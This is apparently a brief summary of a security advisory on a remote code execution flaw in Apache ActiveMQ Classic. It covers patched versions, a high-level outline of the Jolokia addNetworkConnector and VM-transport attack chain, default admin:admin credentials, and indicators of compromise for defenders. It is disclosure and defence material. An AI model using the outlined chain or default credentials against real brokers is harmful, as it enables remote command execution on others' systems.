Overview
- Horizon3.ai reports that Anthropic’s Claude helped identify CVE-2026-34197 in ActiveMQ Classic, and Apache shipped fixes in versions 5.19.4 and 6.2.3.
- The exploit chains Jolokia’s addNetworkConnector operation with the VM transport so the broker fetches a remote Spring XML file that runs system commands.
- The attack generally needs a login to Jolokia, yet many brokers still use the default admin:admin credentials that make access trivial.
- On ActiveMQ 6.0.0 through 6.1.1, a separate flaw tracked as CVE-2024-32114 leaves Jolokia open without authentication, turning this into an unauthenticated RCE.
- Researchers advise upgrading now and checking for IOCs such as POSTs to /api/jolokia/ with addNetworkConnector, vm:// URIs with brokerConfig=xbean:http, outbound HTTP from the broker, or unexpected child processes, noting a high 8.8 severity and no confirmed widespread exploitation.